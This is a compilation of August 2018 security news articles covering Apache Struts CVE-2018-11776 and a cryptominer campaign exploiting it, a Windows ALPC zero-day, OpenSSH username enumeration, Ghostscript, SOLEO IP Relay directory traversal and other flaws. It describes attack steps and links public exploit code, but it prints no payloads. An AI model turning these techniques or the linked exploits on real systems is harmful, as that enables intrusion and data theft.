“Unlike last year’s Apache Struts exploit (CVE-2017-5638), which was at the center of the Equifax breach, this vulnerability appears easier to exploit because it does not require the Apache Struts installation to have any additional plugins running in order to successfully exploit it.”

Experts warn that the CVE-2018-11776 flaw is easier to exploit compared to the CVE-2017-5638Apache Struts flaw that was exploited in the Equifax hack.

The number of potentially vulnerable application could be impressive.

Researchers from Volexity announced to have observed the first malicious campaign targeting the vulnerability just after the PoC was published online.

Threat actors are leveraging the flaw in the attempt to install the CNRig cryptocurrency miner.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner.” states the report published by Volexity.

“The initial observed scanning originated from the Russian and French IP addresses 95.161.225.94 and 167.114.171.27,”

The exploit used in the attacks fetch a copy of CNRig Miner from Github (saves it as xrig) and a shell script from BitBucket by performing wget requests to the URLs the two pieces of code reside at.

The shell script removes previous instances of the miner, removes specific processes, and downloads three ELF crypto mining binaries.

Below the actions performed by the script:

Remove any processes containing the keyword rabbit.
Look for processes containing the keyword check in the name, removing it if it is not the current process.
Remove any instances of upcheck.sh or xrig.
Download three ELF cryptomining binaries, chmod them, execute the files, and then remove them.
Remove nohup.out.
Sleep for ten minutes (600 seconds).
The miners observed in this campaign target multiple architectures, including Intel, ARM, and MIPS.

“The three ELF binaries downloaded are executables for the Intel, ARM, and MIPS architectures. This is worth noting, as it shows the miner is capable of running across a wide range of hardware, such as servers, desktops, laptops, IOT devices, wireless routers, and more — nearly any internet connected device running a vulnerable instance of Apache Struts.”continues the report from Volexity.

The BitBucket folder involved in the attack contains both the shell script and the ELF binaries. Researchers observed that the mining account name is the same as the BitBucket account name.

I have no doubt, the number of campaigns targeting the CVE-2018-11776 vulnerability will rapidly increase. There is a large number of Apache Struts 2 installs still unpatched that are exposed online.


Expert publicly disclosed exploit code for Windows Task Scheduler Zero-Day
29.8.2018 securityaffairs
Exploit  Vulnerebility

A security researcher has publicly disclosed the details of zero-day privilege escalation vulnerability affecting all Microsoft’s Windows operating systems
A security researcher who handles the Twitter account @SandboxEscaper has disclosed the details of zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems that could be exploited by a local attacker or malicious program to obtain system privileges on the vulnerable system.

SandboxEscaper
@SandboxEscaper
Here is the alpc bug as 0day: https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar … I don't fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit.

7:07 PM - Aug 27, 2018

SandboxEscaper/randomrepo
Repo for random stuff. Contribute to SandboxEscaper/randomrepo development by creating an account on GitHub.

github.com
1,338
834 people are talking about this
Twitter Ads info and privacy
According to the expert who disclosed the flaw, the issue also affects a “fully-patched 64-bit Windows 10 system.”

The vulnerability resides in the Windows’ task scheduler program and ties to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

The Advanced Local Procedure Call (ALPC) is an undocumented Inter-Process Communication facility provided by the Microsoft Windows kernel for lightweight (or local) Inter-Process Communication (IPC) between processes on the same computer.

The Advanced local procedure improves high-speed and secure data transfer between one or more processes in the user mode.

Windows zero-day
SandboxEscaper posted a proof-of-concept (PoC) exploit code for the zero-day that was published on GitHub.

The vulnerability was verified by the CERT/CC analyst Will Dormann that posted the following message:

Will Dormann
@wdormann
I've confirmed that this works well in a fully-patched 64-bit Windows 10 system.
LPE right to SYSTEM!

SandboxEscaper
@SandboxEscaper
Here is the alpc bug as 0day: https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar … I don't fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit.

12:08 AM - Aug 28, 2018
193
132 people are talking about this
Twitter Ads info and privacy
The CERT/CC published a security advisory explaining that It could be exploited by a local user to obtain elevated (SYSTEM) privileges.

“Microsoft Windows task scheduler contains a vulnerability in the handling of ALPC, which can allow a local user to gain SYSTEM privileges. We have confirmed that the public exploit code works on 64-bit Windows 10 and Windows Server 2016 systems. Compatibility with other Windows versions may be possible with modification of the publicly-available exploit source code” reads the alert issued by the CERT/CC.

The flaw received a CVSS score of 6.4 to 6.8.
The CERT/CC confirmed that currently there is no workaround for the flaw. The Advanced Local Procedure Call (ALPC) interface is a local system, this limit the impact of the vulnerability. Experts warn of malware that could include the PoC code to gain system privileges on Windows systems.

SandboxEscaper did not report the zero-day to Microsoft, now all Windows systems are vulnerable until the Company will release security updates for its systems.

At the time of writing it is still unclear if the Windows zero-day effects all supported Windows versions, some experts, in fact, said that the PoC code doesn’t work on Windows 7.

Microsoft is expected to address the vulnerability in September security Patch Tuesday, that is scheduled for September 11.


Exploit for Recent Critical Apache Struts Vulnerability Published
28.8.2018 securityweek
Exploit  Vulnerebility

Exploit code for a Critical remote code execution vulnerability in Apache Struts 2 was published on GitHub within days after the bug was addressed last week.

Tracked as CVE-2018-11776, the security flaw was found to impact Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the popular Java framework.

In their advisory, code analysis company Semmle, which discovered the flaw and reported it to the Apache Software Foundation in April, explains that the bug affects commonly-used endpoints of Struts, which are likely to be exposed.

To make matters worse, the issue is related to the Struts OGNL (Object-Graph Navigation Language) language, which hackers are often familiar with.

To exploit the bug, attackers need to inject their own namespace as a parameter in an HTTP request. The value of that parameter, the code analysis company reveals, is insufficiently validated by the Struts framework, and can be any OGNL string.

Although only limited details on the vulnerability were made public, a working proof-of-concept (PoC) was published less than two days after the Apache Software Foundation released their advisory.

On Friday, threat intelligence provider Recorded Future revealed that, in addition to the PoC and a Python script that allows for easy exploitation of the vulnerability, they also detected “chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.”

CVE-2018-11776, Recorded Future says, is even easier to exploit compared to last year’s CVE-2017-5638, the Apache Struts exploit that was at the heart of the Equifax breach. There are hundreds of millions of potentially vulnerable systems, but identification could be challenging, as many are backend application servers.

“The new Apache Struts vulnerability is potentially even more damaging than the one from 2017 that was used to exploit Equifax. Unlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim's Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it,” Allan Liska, Senior Security Architect, Recorded Future, said in an emailed comment to SecurityWeek.

Semmle, on the other hand, won’t confirm whether the PoC is working. However, the company does warn that the published code could provide attackers with a quick way into enterprise networks.

“There is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can’t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure,” Semmle CEO, Oege de Moor, told SecurityWeek via email.

“The Equifax breach happened not because the vulnerability wasn’t fixed, but because Equifax hadn’t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn’t had the time to update their software, will now be at even greater risk,” de Moor said.


Experts warn of possible attacks after PoC code for CVE-2018-11776 Struts flaw was published
27.8.2018 securityaffairs
Vulnerebility

The Exploit code for the recently discovered Critical remote code execution vulnerability CVE-2018-11776 in Apache Struts 2 was published on GitHub, experts fear massive attacks.
The CVE-2018-11776 vulnerability affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and potentially unsupported versions of the popular Java framework.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action se” reads the security advisory published by Apache.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set.”

apache struts 2 flaw

Experts warn that it is possible to trigger the RCE flaw when namespace value isn’t set for a result defined in underlying XML configurations and at the same time, its upper action(s) configurations have no or wildcard namespace.

The flaw could be also exploited when using URL tag which doesn’t have value and action set and at the same time, its upper action(s) configurations have no or wildcard namespace.

According to the experts from Semmle that discovered the flaw, the vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

An attacker could trigger the flaw by injecting his own namespace as a parameter in an HTTP request. The lack of proper validation for that parameter is the root of the problem.

Just two days after the Apache Software Foundation released their advisory a working proof-of-concept (PoC) was published online.

According to the experts from the threat intelligence firm Recorded Future, there is an intense activity related to the Struts flaw in a number of Chinese and Russian underground forums.

” Unfortunately, this makes the vulnerability trivial to exploit — in fact, proof-of-concept code has already been released, including a Python script that allows for easy exploitation. Recorded Future has also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.” reads the analysis published by Recorded Future.

“Unlike last year’s Apache Struts exploit (CVE-2017-5638), which was at the center of the Equifax breach, this vulnerability appears easier to exploit because it does not require the Apache Struts installation to have any additional plugins running in order to successfully exploit it.”

Experts warn that the CVE-2018-11776 flaw is easier to exploit compared to the CVE-2017-5638 Apache Struts flaw that was exploited in the Equifax hack.

The number of potentially vulnerable application could be impressive.

“Apache Struts is a very popular Java framework and there are potentially hundreds of millions of vulnerable systems that could be exploited by this flaw. The challenge is in identifying how many systems are vulnerable.” continues Recorded Future.

“Because many of the servers running Apache Struts are backend application servers, they are not always easily identified, even by the system owners.”

The principal problem is that there are many reasons because Struts installs cannot be immediately updated especially in Critical systems.


Expert found a flaw that affects all OpenSSH versions since 1999
24.8.2018 securityaffairs
Vulnerebility

Security expert discovered a username enumeration vulnerability in the OpenSSH client that affects all versions of the software that was released since 1999.
Security expert Darek Tytko from securitum.pl has discovered a username enumeration vulnerability in the OpenSSH client. The flaw tracked as CVE-2018-15473 affects all versions of the software that was released since 1999. The vulnerability could be exploited by a remote attacker to guess the usernames registered on an OpenSSH server.

OpenSSH maintainers have now released a security fix, but since the OpenSSH client is included in a broad range of software applications many of them could remain vulnerable for a long time.

Researchers from Qualys have published a detailed analysis of the vulnerability once discovered that the bug was fixed.

The flaw could potentially impact billion of devices using the vulnerable software.

Let’s see in detail how attackers can trigger the flaw.

The attacker tries to authenticate on an OpenSSH endpoint using a malformed authentication request (i.e. a truncated packet).

A vulnerable OpenSSH server, in turn, would respond in two different ways.

If the username included in the malformed authentication request does not exist, the server responds with authentication failure reply, otherwise, the server closes the connection without a reply.

“The attacker can try to authenticate a user with a malformed packet (for example, a truncated packet), and:

if the user is invalid (it does not exist), then userauth_pubkey() returns immediately, and the server sends an SSH2_MSG_USERAUTH_FAILURE to the attacker;
if the user is valid (it exists), then sshpkt_get_u8() fails, and the server calls fatal() and closes its connection to the attacker.” states the advisory.
“We believe that this issue warrants a CVE; it affects all operating systems, all OpenSSH versions (we went back as far as OpenSSH 2.3.0, released in November 2000), and is easier to exploit than previous OpenSSH username enumerations (which were all timing attacks):”

OpenSSH

The flaw could allow an attacker to guess valid usernames registered on an SSH server, then to launch brute-force attacks to guess the password.

Open SSH versions 1:6.7p1-1 and 1:7.7p1-1— and the 1:7.7p1-4 unstable branch have addressed the flaw.

Proof-of-concept codes for the vulnerability are already available online:

https://www.exploit-db.com/exploits/45233/
https://github.com/Rhynorater/CVE-2018-15473-Exploit
The security researchers Didier Stevens of NVISO Labs also published a detailed analysis of the flaw that includes instructions to test servers against it.


Critical Apache Struts 2 Flaw Allows Remote Code Execution
23.8.2018 securityweek
Vulnerebility

Updates released on Wednesday for the Apache Struts 2 open source development framework address a critical vulnerability that can be exploited for remote code execution.

The flaw, tracked as CVE-2018-11776, affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Patches are included in Struts 2.3.35 and 2.5.17. A temporary workaround has also been made available, but Struts developers have described it as “weak” and advised users to install the updates as soon as possible.

“It is possible to perform a RCE attack when namespace value isn't set for a result defined in underlying xml configurations and in same time, its upper action(s) configurations have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set and in same time, its upper action(s) configurations have no or wildcard namespace,” Struts developers wrote in an advisory.

The vulnerability was discovered by a researcher from Semmle, a code analysis company that announced its global launch this week, along with $21 million in funding.

Semmle has published a blog post containing technical details on the vulnerability. According to the company, the issue was reported to the Apache Struts Security Team on April 10 and code patches were released on June 25.

“This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers. On top of that, the weakness is related to the Struts OGNL language, which hackers are very familiar with, and are known to have been exploited in the past,” said Man Yue Mo, the Semmle researcher who discovered CVE-2018-11776.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

Semmle has only made public limited details in an effort to prevent malicious exploitation. The company last year discovered another Apache Struts vulnerability that ended up being exploited in the wild. However, the new flaw is even more severe, Man Yue Mo said.

Apache Struts vulnerabilities can pose a significant risk to organizations. A flaw affecting the framework was exploited in the massive Equifax breach that impacted over 140 million individuals.


Unpatched Ghostscript Vulnerabilities Impact Popular Software
23.8.2018 securityweek
Vulnerebility

Ghostscript Impacted by Multiple -dSAFER Sandbox Bypass Vulnerabilities

Unpatched vulnerabilities in Ghostscript impact a broad range of popular software products, including several Linux distributions, CERT/CC reveals in a Tuesday alert.

Ghostscript, a suite of software based on an interpreter for Adobe's PostScript and PDF page description languages, is widely used across stand-alone and web applications, including packages such as GIMP and ImageMagick.

The same as other highly popular software out there, vulnerabilities in Ghostscript are valuable targets for both cybercriminals and threat actors, and such flaws have been already abused by North Korea-linked hackers.

Now, Google Project Zero security researcher Tavis Ormandy says that Ghostscript is impacted by multiple critical vulnerabilities and that “ImageMagick, Evince, GIMP, and most other PDF/PS tools” are impacted as well.

In addition to several -dSAFER sandbox escapes reported a few years ago, the popular interpreter is also impacted by “a few file disclosure, shell command execution, memory corruption and type confusion bugs,” the researcher says.

Although there is a -dSAFER option to prevent unsafe PostScript operations, there are numerous operations that bypass the protections provided by -dSAFER, thus allowing an attacker to execute arbitrary commands with arbitrary arguments, the CERT/CC warns.

In their alert, CERT/CC notes not only that there are multiple -dSAFER sandbox bypass vulnerabilities impacting Ghostscript, but also that these are inherited in all applications that leverage the interpreter. These flaws could be exploited by an unauthenticated attacker for remote command execution.

Artifex Software, ImageMagick, Red Hat, and Ubuntu products have been already found to be affected, but other products might be impacted as well. Thus, CERT/CC decided to warn all major software companies on the issue.

One solution to the issue, Ormandy notes, is to disable all the ghostscript coders in policy.xml. CERT/CC also advises the use of policy.xml security policy to disable the processing of PS, EPS, PDF, and XPS content.

“In the short term the advice for distribution to start disabling PS, EPS, PDF and XPS coders by default is the only defense until a fix is available,” Stephen Giguere, Sales Engineer at Synopsys, confirms in an emailed statement for SecurityWeek.

“Ghostscript is used pretty much everywhere and has been for a very long time. Packages like GIMP (a Photoshop alternative) but more important for web applications, ImageMagick are prevalent to the extent of being standard for the processing of PDF files. This exploit has the potential for file system access leading to sensitive data leak and more as it can be the beachhead opportunity for a more comprehensive data breach,” Giguere says.


Microsoft Releases Intel Microcode Patches for Foreshadow Flaws
23.8.2018 securityweek
Vulnerebility

Microsoft this week made available another round of microcode updates created by Intel for mitigating the recently disclosed speculative execution vulnerabilities tracked as Foreshadow and L1 Terminal Fault (L1TF).

The Foreshadow/L1TF vulnerabilities are CVE-2018-3615, which impacts Intel’s Software Guard Extensions (SGX); CVE-2018-3620, which impacts operating systems and System Management Mode (SMM); and CVE-2018-3646, which affects virtualization software and Virtual Machine Monitors (VMM).

A piece of malware installed on a vulnerable system can exploit the flaws to gain access to potentially sensitive data stored in supposedly protected memory. The security holes affect Intel’s Xeon and Core processors.

Intel and other major tech firms have released mitigations which, in combination with the patches released previously for Meltdown, Spectre and other speculative execution vulnerabilities, should prevent attacks.

Microsoft this week released five new updates: KB4346084, KB4346085, KB4346086, KB4346087 and KB4346088. They deliver Intel’s microcode patches for Windows 10 Release To Market (RTM), Windows 10 version 1709 (Fall Creators Update), Windows Server 2016 version 1709 (Server Core), Windows 10 Version 1703 (Creators Update), Windows 10 version 1607 (Anniversary Update), Windows Server 2016, Windows 10 version 1803 (April 2018 Update), and Windows Server version 1803 (Server Core).

The microcode updates are for devices with Skylake, Kaby Lake and Coffee Lake processors, and they resolve Spectre Variant 3a (CVE-2018-3640), Spectre Variant 4 (CVE-2018-3639), and the Foreshadow flaws (CVE-2018-3615, CVE-2018-3620, CVE-2018-3646).

The mitigations for the Foreshadow vulnerabilities should not have a noticeable performance impact on consumer PCs, but performance degradation may be seen on some data center workloads.

According to Microsoft, patching the Foreshadow vulnerabilities may require both software and firmware (microcode) updates, depending on how the system is configured. However, the company says most devices running Windows client operating systems will only need software updates for protection.


Expert discovered a Critical Remote Code Execution flaw in Apache Struts (CVE-2018-11776)
23.8.2018 securityaffairs
Vulnerebility

Maintainers of the Apache Struts 2 open source development framework has released security updates to address a critical remote code execution vulnerability.
Security updates released this week for the Apache Struts 2 open source development framework addressed a critical RCE tracked as CVE-2018-11776.

The vulnerability affects Struts versions from 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

The versions Struts 2.3.35 and 2.5.17 includes the security updates to address the CVE-2018-11776.

Struts developers also published a temporary workaround, but are recommending users to don’t use it and install the updates.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action se” reads the security advisory published by Apache.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set.”

apache struts 2 flaw

Experts warn that it is possible to trigger the RCE flaw when namespace value isn’t set for a result defined in underlying xml configurations and at the same time, its upper action(s) configurations have no or wildcard namespace.

The flaw could be also exploited when using url tag which doesn’t have value and action set and at the same time, its upper action(s) configurations have no or wildcard namespace.

The vulnerability was reported by Man Yue Mo from the Semmle Security Research team on April 10, security updates were released on June 25 and on 22 August 2018 the new versions of Struts were released.

“This vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework. Due to the fact that this vulnerability affects the core of Struts, there exist multiple separate attack vectors. At the moment, we are aware of two such vectors” reads the technical analysis published bb Semmle.

“For your application to be vulnerable to the attack vectors described below, both of the following conditions should hold:

The alwaysSelectFullNamespace flag is set to true in the Struts configuration. Note that this is automatically the case if your application uses the popular Struts Convention plugin.
Your application’s Struts configuration file contains an <action …>tag that does not specify the optional namespace attribute, or specifies a wildcard namespace (e.g. “/*”)”
The experts from Semmle explained that the flaw affects commonly-used endpoints of Struts which are likely to be exposed.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

Apache Struts flaw are very dangerous for organizations, one of them was the root cause of the massive Equifax breach that impacted over 140 million people.


Adobe Patches Critical Code Execution Flaws in Photoshop
22.8.2018 securityweek
Vulnerebility

Adobe late on Tuesday released updates for the Windows and macOS versions of Photoshop CC to address two critical remote code execution vulnerabilities.

The flaws impact Photoshop CC 2018 version 19.1.5 and earlier 19.x versions, and Photoshop CC 2017 18.1.5 and earlier 18.x versions. The issues have been addressed with the release of versions 19.1.6 and 18.1.6.

The security holes, reported by Kushal Arvind Shah of Fortinet's FortiGuard Labs, have been described by Adobe as memory corruption bugs that can be exploited by a remote attacker to execute arbitrary code in the context of the targeted user.

The vulnerabilities are tracked as CVE-2018-12810 and CVE-2018-12811.

While the flaws have been assigned a “critical” severity rating, their priority rating is “3,” which indicates that the affected product has historically not been targeted by malicious actors. In this case, users are advised by Adobe to install the updates “at their discretion.”

Earlier this month, Adobe addressed nearly a dozen vulnerabilities in Flash Player, the Creative Cloud Desktop Application, Experience Manager, and Acrobat and Reader with the company’s Patch Tuesday updates for August 2018. None of the flaws have been exploited in the wild.

It’s unclear why the Photoshop CC updates were not included in the Patch Tuesday updates.

Last month, researchers claimed they had found a potentially serious security issue in Adobe’s internal systems, but the company downplayed the impact of the vulnerability saying it was only an XSS flaw.


A critical remote code execution flaws in Ghostscript could allow to completely take over affected system
21.8.2018 securityaffairs
Vulnerebility

The popular Google Project Zero white hat hacker Tavis Ormandy has found a critical remote code execution (RCE) vulnerability in Ghostscript.
Ghostscript is an open source suite of software based on an interpreter for Adobe Systems’ PostScriptand Portable Document Format (PDF) page description languages.

Ghostscript is a multiplatform software written in C language, it allows to convert PostScript language files (or EPS) to several raster formats (i.e. PDF, XPS, PCL or PXL).

Many PDF and image editing software such as GIMP and ImageMagick leverage the library to convert file formats.

Ghostscript implements a -dSAFER sandbox protection option that handles untrusted documents, it aims at preventing malicious PostScript operations from being executed.

A couple of years ago, Ormandy disclosed several -dSAFER sandbox escapes in the popular library, at the time he found a few file disclosure, shell command execution, memory corruption and type confusion bugs.

Now Ormandy discovered that the library contains multiple -dSAFER sandbox bypass flaws that could be exploited by a remote, unauthenticated attacker to execute arbitrary commands on a vulnerable system.

A remote attacker can trigger the flaw by sending a specially crafted malicious file (i.e. PDF, PS, EPS, or XPS) to the victim. Once the victim has opened the file with an application using vulnerable software, the attacker will be able to execute arbitrary code of the system and to take over it.

Artifex Software, the company that maintains the open source software still hasn’t released any security update to address the vulnerability.

The US-CERT published a security advisory to warn that applications using the Ghostscript library by default to process PostScript content are vulnerable.

“Ghostscript contains multiple -dSAFER sandbox bypass vulnerabilities, which may allow a remote, unauthenticated attacker to execute arbitrary commands on a vulnerable system.” reads the security advisory.

“By causing Ghostscript or a program that leverages Ghostscript to parse a specially-crafted file, a remote, unauthenticated attacker may be able to execute arbitrary commands with the privileges of the Ghostscript code.”

ghostscript

Both RedHat and Ubuntu distros have confirmed that they are affected by this vulnerability.

Ormandy recommends Linux distros to disable the processing of PS, EPS, PDF, and XPS content until the vulnerability is fixed.

“I *strongly* suggest that distributions start disabling PS, EPS, PDF and XPS coders in policy.xml by default,” suggested Ormandy.


Adobe security updates address 2 critical code execution flaws in Photoshop
21.8.2018 securityaffairs
Vulnerebility

Yesterday Adobe released security updates for two critical code execution vulnerabilities affecting Windows and macOS versions of Photoshop CC.
Adobe released updates to address two critical code executions flaws that affect Photoshop for Windows and macOS versions of Photoshop CC.

The vulnerabilities, tracked as CVE-2018-12810 and CVE-2018-12811, are memory corruption issues that could be exploited by a remote attacker to execute arbitrary code in the context of the targeted user.

“Adobe has released updates for Photoshop CC for Windows and macOS. These updates resolve critical vulnerabilities in Photoshop CC 19.1.5 and earlier 19.x versions, as well as 18.1.5 and earlier 18.x versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

Adobe addressed both flaws with the release of versions 19.1.6 and 18.1.6.

The vulnerabilities affect Photoshop CC 2018 version 19.1.5 and earlier 19.x versions, and Photoshop CC 2017 18.1.5 and earlier 18.x versions.

Adobe Photoshop

The Adobe Patch Tuesday for August 2018 addressed a total of 11 vulnerabilities in Flash Player, the Creative Cloud Desktop Application, Experience Manager, and Acrobat and Reader.

None of the patched vulnerabilities been exploited by attackers in the wild.


Vulnerability in IP Relay Service Impacts Major Canadian ISPs
21.8.2018 securityweek
Vulnerebility

A recently addressed local file disclosure vulnerability in the SOLEO IP Relay service impacted nearly all major Internet service providers (ISPs) in Canada, a security researcher has discovered.

Also known as telecommunications relay services (TRSs), the IP relays developed by Soleo Communications are available through all major ISPs in Canada.

The cloud-based IP Relay service was launched over half a decade ago to allow hearing-impaired individuals and those with speech disorders to place calls through a TTY (text terminal) or other assistive telephone device.

Because of improper input sanitization, these services exposed sensitive user information, Project Insecurity researcher Dominik Penner discovered.

In a report (PDF) published late last week, the security researcher explains that the security flaw could be abused to determine the layout of the IPRelayApp directory and find the location of the source files on the IP Relay server. All of the discovered files could then be downloaded by an attacker, the researcher says.

The files were found to be classes compiled in Java bytecode, but “a determined attacker would easily be able to convert this directly back to source, compromising source code and other sensitive files,” Penner points out.

The source code also includes passwords the servlet uses to communicate with other services and an attacker able to extract these passwords could then either escalate their privileges on the server or abuse the extracted information in social engineering attacks.

“The end result could be escalated to yield remote code execution, though we were not comfortable attempting to do this before getting in contact with the vendor,” the researcher notes.

Working in collaboration with security researcher Manny Mand, Penner discovered that at least ten Canadian ISPs were running the vulnerable instance of Soleo’s IP Relay. Six of these, Penner says, are the largest telecom providers in Canada.

“[W]e have confirmed that a determined attacker (APT/foreign entity) could leverage this vulnerability to steal passwords from configuration files across multiple providers, compromise said providers using the stolen passwords, and then potentially​ launch a large scale identity theft operation against Canadians,” the researcher says.

An attacker exploiting the vulnerability could compromise over 30 million Canadian records, he said.

The bug was reported to the vendor on July 19 and was confirmed as patched on August 10.


Flaw in SOLEO IP Relay Service potentially exposed over 30 million Canadian records
20.8.2018 securityaffairs
Vulnerebility

Major Internet service providers (ISPs) in Canada were impacted by a local file disclosure flaw in the SOLEO IP Relay service that was recently addressed.
Almost all major Internet service providers (ISPs) in Canada were impacted by a local file disclosure vulnerability in the SOLEO IP Relay service that was recently addressed.

Telecommunications relay services (TRSs) developed by Soleo Communications are IP relay services used by major Internet service providers (ISPs) in Canada.

The SOLEO IP Relay service is a cloud-based IP Relay service for telecommunications providers that allows people who are deaf, hard of hearing, or have a speech disorder to place calls through a TTY or other assistive telephone device.

According to Project Insecurity researcher Dominik Penner, the flaw ties the improper input sanitization and leads to the exposure of sensitive user information.

“This vulnerability exists due to the fact that there is improper sanitization on the
“page” GET parameter in servlet/IPRelay. A developer should always check for
dangerous characters in filenames. In this case, we were able to navigate our way
through the server and into the WEB-INF directory by using directory traversal
characters (../)” states the vulnerability report published by the researcher.

The impact of such vulnerability is severe, a foreign attacker can trigger the vulnerability to compromise over 30 million Canadian records.

An attacker can exploit the security vulnerability to determine the composition of the IPRelayApp directory and find the location of the source files on the IP Relay server and then download them.

The experts highlighted that WEB-INF directory is within the IPRelayApp directory, this means that they were able to load web.xml, a XML document that has a few mappings for Tomcat to understand where to pull certain files from.

“At this point, we wrote a nice little proof-of-concept to parse the web.xml file and
find the location of the source files.” continues the report.

“All of the following files can be downloaded by loading them from
WEB-INF/classes/*. ” “Once again, to confirm severity, we tried to load one of these
files. After loading this file into our text editor, it was evident that these classes had been compiled in Java bytecode. However, a determined attacker would easily be able to convert this directly back to source, compromising source code and other sensitive
files.”

SOLEO IP relay

An attacker accessing the source code could retrieve the passwords the servlet uses to communicate with other services could escalate his privileges on the server or use the information in other attacks.

“ An attacker could extract these passwords from within the source files, and further escalate their privileges on the server, or even use said information in a social engineering attack. The end result could be escalated to yield remote code execution, though we were not comfortable attempting to do this before getting in contact with the vendor” the researcher continues.

Penner discovered that at least ten of major Canadian ISPs were running the vulnerable Soleo IP Relay.

“To conclude this report, we have confirmed that a determined attacker (APT/foreign
entity) could leverage this vulnerability to steal passwords from configuration files
across multiple providers, compromise said providers using the stolen passwords,
and then potentially launch a large scale identity theft operation against Canadians.” concludes the report.

The expert reported the flaw to SOLEO on July 19 and it was patched on August 10.


Twitch bug may have exposed some users messages to others
20.8.2018 securityaffairs
Vulnerebility

A glitch in the live streaming platform Twitch may have exposed some of its users’ private messages to other users. The company is notifying affected users.
The live streaming platform Twitch warning users that a glitch may have exposed some of their private messages to other users.

The company sent out the notifications to some broadcasters informing them that a software bug could have changed access permissions to older messages allowing other users to download them and read them.

The flaw affected recently removed a feature dubbed Messages that have exposed some the messages.

“I reached out to Twitch for a comment, and a company spokesperson says that it has fixed the bug. It also explained that most of the exposed messages were promotional announcements that went out to everyone who subscribes to certain channels. But it’s possible that this also affected private communications featuring more sensitive information as well.” reported VentureBeat.

Twitch email
Copy of the email sent by Twitch obtained by Bleeping Computer

“In May, we removed a legacy feature called Messages and provided users the ability to download an archive of past messages. Due to a bug in the code that generated the message archive files, which has since been fixed, a small percentage of user messages were included in the wrong archives.” reads the statement from Twitch’s spokesperson.

“The primary use case for Messages was promotion; streamers sending out mass communication to subscribers for example, and the majority of messages that were unintentionally provided to another user fall into that category. We have notified users via email and provided them the affected messages for review. Protecting our users’ privacy is important to us and we have taken actions to ensure this kind of error does not happen in the future.”

According to Twitch, the bug only affected the Messages feature, and there were no private messages sent via the Twitch Whisper systems included in these archives.

Twitch users can discover if their messages were accidentally exposed by visiting the website twitch.tv/messages/archive.

Searching on Twitter it is possible to find messages of Twitter users that found messages in their archive belonging to other users.

Elspeth Eastman
@elspetheastman
So uh hey did anyone else get that unsettling email about people possibly downloading your archived Twitch Messages by mistake because I sure did.

“A small percentage of messages were included in the wrong archives”

8:42 PM - Aug 16, 2018
60
16 people are talking about this
Twitter Ads info and privacy

kaitlyn, solid
@kaitly_n
at first when i saw my twitch messages were mistakenly sent to other users i was p concerned

so i checked and saw it was just this one.

if anything i should thank @twitch. in fact, everyone can have this message. i'm happy to serve as an example of banning that shit in 2014. 😎

9:22 PM - Aug 16, 2018
38
See kaitlyn, solid's other Tweets
Twitter Ads info and privacy
Anyway, Twitch sent a warning message to all affected users.


Linux Kernel Project rolled out security updates to fix two DoS vulnerabilities
17.8.2018 securityaffairs
Vulnerebility

Linux kernel maintainers have rolled out security updates for two DoS vulnerabilities tracked as SegmentSmack and FragmentSmack.
Linux kernel maintainers have released security patches that address two vulnerabilities, tracked as two bugs are known as SegmentSmack (CVE-2018-5390) and FragmentSmack (CVE-2018-5391). potentially exploitable to trigger a DoS condition.

The vulnerabilities reside the Linux kernel’s TCP stack, an attacker can exploit them by sending malformed TCP or IP packets to cause the cause a significant resource usage in Linux-based systems.

The saturation of resources on the vulnerable system could lead to their reboot.
An attacker can exploit SegmentSmack issue via a specially crafted stream of TCP segments, while the second vulnerability, FragmentSmack, could be triggered by sending a specially crafted stream of IP datagrams.

The bug for the SegmentSmack resides in the tcp_collapse_ofo_queue() function, while the second issue affects the tcp_prune_ofo_queue() function.

